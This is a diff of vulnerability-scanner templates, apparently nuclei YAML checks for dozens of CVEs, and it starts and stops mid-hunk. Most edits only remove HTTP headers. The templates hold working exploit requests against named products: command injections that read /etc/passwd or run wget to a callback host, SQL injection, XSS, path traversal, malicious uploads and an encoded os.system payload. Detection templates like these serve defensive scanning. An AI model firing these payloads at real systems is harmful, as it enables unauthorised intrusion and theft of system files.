+12,10 @@ requests: - | POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json Referer: {{Hostname}}/user/register X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 - Content-Length: 626 - Connection: close -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml index bb3a606f79..7341f180dd 100644 --- a/cves/2018/CVE-2018-8715.yaml +++ b/cves/2018/CVE-2018-8715.yaml @@ -14,11 +14,6 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Authorization: Digest username=admin matchers-condition: and diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml index 6943ee9c04..cb37d90548 100644 --- a/cves/2019/CVE-2019-1010287.yaml +++ b/cves/2019/CVE-2019-1010287.yaml @@ -16,14 +16,7 @@ requests: - | POST /timesheet/login.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Content-Length: 91 - DNT: 1 - Connection: keep-alive - Upgrade-Insecure-Requests: 1 username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login @@ -32,6 +25,7 @@ requests: - type: status status: - 200 + - type: word words: - '>' diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 3d64ab75f5..2053f87579 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -22,7 +22,6 @@ requests: - | POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded yuzo_related_post_css_and_style= @@ -30,8 +29,6 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Upgrade-Insecure-Requests: 1 req-condition: true matchers-condition: and diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index 7569402a99..14ca50d4c4 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -17,8 +17,6 @@ requests: GET /wan.htm HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers-condition: and matchers: diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index 2229b3f142..9d736b993d 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -13,14 +13,9 @@ requests: - | POST /password_change.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Referer: https://{{Hostname}}/ + Referer: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Content-Length: 73 - Connection: close - Upgrade-Insecure-Requests: 1 user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 diff --git a/cves/2019/CVE-2019-16278.yaml b/cves/2019/CVE-2019-16278.yaml index 4628e2aa48..21efd21490 100644 --- a/cves/2019/CVE-2019-16278.yaml +++ b/cves/2019/CVE-2019-16278.yaml @@ -12,9 +12,6 @@ requests: - | POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 - Content-Length: 1 - Connection: close echo echo diff --git a/cves/2019/CVE-2019-16920.yaml b/cves/2019/CVE-2019-16920.yaml index 5548784290..2ac46ac67b 100644 --- a/cves/2019/CVE-2019-16920.yaml +++ b/cves/2019/CVE-2019-16920.yaml @@ -13,41 +13,27 @@ requests: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 + Referer: {{BaseURL}} html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + matchers-condition: and matchers: - type: regex @@ -55,6 +41,7 @@ requests: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or + part: body - type: status status: diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index 951533f8d8..d25a72cee2 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -13,7 +13,6 @@ requests: - | GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 Accept-Language: en-US,en;q=0.9 payloads: diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index 4293fed10d..b7c1855604 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -11,14 +11,11 @@ requests: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} - Accept-Language: en - Connection: close - | POST /solr/{{core}}/config HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Content-Length: 259 { "update-queryresponsewriter": { diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index 7a4d6d2413..1d87fb5936 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -16,7 +16,6 @@ requests: POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Length: 76 Content-Type: text/xml; charset=UTF-8 diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml index 48af892d4f..dd385d5b7f 100644 --- a/cves/2019/CVE-2019-3396.yaml +++ b/cves/2019/CVE-2019-3396.yaml @@ -12,12 +12,7 @@ requests: - | POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: {{Hostname}} - Accept: */* - Accept-Language: en-US,en;q=0.5 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Referer: {{Hostname}} - Content-Length: 168 - Connection: close {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} @@ -26,6 +21,7 @@ requests: - type: status status: - 200 + - type: word words: - "contextConfigLocation" diff --git a/cves/2019/CVE-2019-6715.yaml b/cves/2019/CVE-2019-6715.yaml index 343ea0316b..e004b0f931 100644 --- a/cves/2019/CVE-2019-6715.yaml +++ b/cves/2019/CVE-2019-6715.yaml @@ -12,11 +12,7 @@ requests: - | PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 Host: {{Hostname}} - Accept: */* - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 - Content-Length: 124 Content-Type: application/x-www-form-urlencoded - Connection: close {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"} diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index 660516cef2..a236e9b923 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -11,31 +11,21 @@ info: tags: cve,cve2019,emerge,rce requests: - - raw: # Default Port + - raw: - | GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 + - | GET /nuclei.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml index d2fd2f0946..97c3a627c3 100644 --- a/cves/2019/CVE-2019-7609.yaml +++ b/cves/2019/CVE-2019-7609.yaml @@ -10,31 +10,27 @@ info: - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 tags: cve,cve2019,kibana,rce - # Kibana versions before 5.6.15 and 6.6.1 - # contain an arbitrary code execution flaw in the Timelion visualizer. - # An attacker with access to the Timelion application could send a request - # that will attempt to execute javascript code. - # This could possibly lead to an attacker executing arbitrary commands - # with permissions of the Kibana process on the host system. - requests: - method: POST path: - "{{BaseURL}}/api/timelion/run" headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" Content-Type: "application/json; charset=utf-8" - body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}" + + body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + matchers-condition: and matchers: - type: word words: - "seriesList" part: body + - type: word words: - - "Content-Type: application/json" + - "application/json" part: header + - type: status status: - 200 \ No newline at end of file diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml index fcb6483f59..059f75bb43 100644 --- a/cves/2019/CVE-2019-9670.yaml +++ b/cves/2019/CVE-2019-9670.yaml @@ -12,7 +12,6 @@ requests: - | POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/xml /usr/local/netsweeper/webadmin/out + # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/out" headers: - Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php" - User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)" - Connection: "close" + Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" + matchers-condition: and matchers: - type: word words: - "nonexistent" part: body + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml index c9408d639e..4a4140cb1c 100644 --- a/cves/2020/CVE-2020-15568.yaml +++ b/cves/2020/CVE-2020-15568.yaml @@ -13,13 +13,11 @@ requests: - | GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded - | GET /include/nuclei.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml index 5ba27f8bc5..12f3ac20ab 100644 --- a/cves/2020/CVE-2020-16139.yaml +++ b/cves/2020/CVE-2020-16139.yaml @@ -14,7 +14,6 @@ requests: - | POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 matchers-condition: and matchers: diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml index 3f0e6b6d93..c98ea1fe16 100644 --- a/cves/2020/CVE-2020-17505.yaml +++ b/cves/2020/CVE-2020-17505.yaml @@ -13,16 +13,12 @@ requests: - | GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close - | GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close cookie-reuse: true matchers-condition: and @@ -33,6 +29,7 @@ requests: - "Position: ||whoami||" - "root" condition: and + part: body - type: status status: diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index c0d3c87ab1..8e59416072 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -16,9 +16,7 @@ requests: POST /jars/upload HTTP/1.1 Host: {{Hostname}} Accept: */* - Accept-Language: en Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y - Content-Length: 187 ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index db823bc245..13d8570a5b 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -14,25 +14,14 @@ requests: GET /?p=1 HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 745 - Accept: */* X-Requested-With: XMLHttpRequest - sec-ch-ua-mobile: ?0 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak Origin: {{BaseURL}} - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: cors - Sec-Fetch-Dest: empty Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index 5f354d7712..24b6fd03d9 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml @@ -13,34 +13,21 @@ requests: - | # Response:Location: /page/login/login_fail.html POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - DNT: 1 - Connection: close Cookie: uid=6gPjT2ipmNz - Upgrade-Insecure-Requests: 1 - Content-Length: 0 username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - DNT: 1 - Connection: close Cookie: uid=6gPjT2ipmNz - Upgrade-Insecure-Requests: 1 - Content-Length: 0 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "nobody:[x*]:65534:65534" diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 88ec587026..f2553035ef 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -19,9 +19,7 @@ requests: POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Content-Length: 608 Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 - Connection: close --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 10a508915e..d2352c64ac 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -15,18 +15,14 @@ requests: - | POST /cgi-bin/system_mgr.cgi? HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` - | POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close matchers: - type: word diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index 8381e16ece..b9efcf09b6 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -15,9 +15,7 @@ requests: - | POST /login.htm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd= diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index a4d926f2a5..e511013c53 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -16,17 +16,10 @@ requests: - | GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive + - | GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive matchers: - type: word diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index eb7d3e6d13..e320eb589c 100644 --- a/cves/2020/CVE-2020-28208.yaml +++ b/cves/2020/CVE-2020-28208.yaml @@ -14,10 +14,7 @@ requests: POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - X-Requested-With: XMLHttpRequest Content-Type: application/json - User-Agent: Ophion SecurityGroup - Accept-Language: en-US,en;q=0.9 {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"} diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index d65d7e96c6..a5e9540ba2 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -13,12 +13,9 @@ requests: - | POST /goform/setSysAdm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive - Origin: http://{{Hostname}} - Referer: http://{{Hostname}}/login.shtml + Origin: {{BaseURL}} + Referer: {{BaseURL}}/login.shtml admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index cf3a2d1395..af6da1dcfa 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml @@ -17,7 +17,6 @@ requests: POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Content-Length: 44 SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml index 8f6e44259c..835ccc29ed 100644 --- a/cves/2020/CVE-2020-35951.yaml +++ b/cves/2020/CVE-2020-35951.yaml @@ -14,30 +14,16 @@ requests: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 - Connection: close - | GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 - Connection: close - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 269 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92 - Accept: */* - Accept-Language: en-US,en;q=0.9 - Connection: close + ------WebKitFormBoundaryBJ17hSJBjuGrnW92 Content-Disposition: form-data; name="action" @@ -52,11 +38,6 @@ requests: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 - Connection: close extractors: - type: regex diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index f5a620db25..def510535d 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml @@ -15,14 +15,6 @@ requests: - | GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - DNT: 1 - Connection: close - Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n - Upgrade-Insecure-Requests: 1 matchers: - type: word diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 2ab9a084ee..6107fbb57a 100644 --- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -15,8 +15,6 @@ requests: POST /dfsms/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Connection: close - Content-Length: 66 username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml index 54c13f3586..e55a8ef228 100644 --- a/cves/2020/CVE-2020-5902.yaml +++ b/cves/2020/CVE-2020-5902.yaml @@ -26,11 +26,13 @@ requests: - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release" - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license" - "{{BaseURL}}/hsqldb%0a" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" @@ -38,41 +40,35 @@ requests: - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}" - "HSQL Database Engine Servlet" condition: or - part: body + - raw: - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=create%20cli%20alias%20private%20list%20command%20bash - | POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=list%20%2Ftmp%2Fnonexistent - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=delete%20cli%20alias%20private%20list + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "h3ll0_w0Rld" diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 70fc14a6ca..1ca340cabb 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -14,9 +14,6 @@ requests: - | GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 